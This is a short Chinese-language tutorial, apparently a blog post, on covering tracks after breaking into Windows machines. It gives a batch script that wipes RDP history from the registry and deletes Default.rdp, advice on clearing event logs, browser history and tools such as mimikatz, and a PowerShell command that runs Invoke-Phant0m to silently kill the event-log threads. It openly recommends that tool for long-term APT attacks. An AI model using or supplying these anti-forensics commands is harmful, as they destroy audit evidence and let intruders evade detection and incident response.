其实清理入侵痕迹的技术要求点不多,而且也相对没有那么重要,但是渗透测试工程师可以作为一个良好的习惯进行保留,对自己是百利无一害的,本文介绍的方法都比较简单,也比较实用。

    直接清除RDP日志

    1. @echo off
    2. reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    3. reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    4. reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    5. cd %userprofile%\documents\
    6. attrib Default.rdp -s -h
    7. del Default.rdp

    1、黑客工具:有一个良好的习惯,及时删除自己的黑客工具(mimikatz之类的东西)
    2、浏览器:如果通过其他服务器进行内网入侵的时候,记得及时删除浏览器历史记录。
    3、系统默认日志 : eventvwr.msc 右键把应用程序,安全,Setup ,系统 四个默认日志记录都删除
    image.png

    4、使用脚本Invoke-Phant0m破坏系统日志记录功能
    https://github.com/hlldz/Invoke-Phant0m
    此脚本集合在PSattack渗透框架中,此脚本的作用就是破坏日志记录的功能,如果你需要都一个目标进行APT长期的攻击的时候,可以尝试使用该工具

    原理:通过该脚本遍历事件日志服务进程(专用svchost.exe)的线程堆栈,并标识事件日志线程以杀死事件日志服务线程。因此,系统将无法收集日志,同时事件日志服务还会运行

    利用方法:

    1. powershell -exec bypass Import-Module .\Invoke-Phant0m.ps1 Invoke-Phant0m

    image.png
    此时service依旧显示日志记录功能开启
    image.png

    http://www.360doc.com/content/20/0912/13/114824_935266802.shtml

    5、除此之外,还有https://github.com/3gstudent/Windows-EventLog-Bypass也能破坏系统日志功能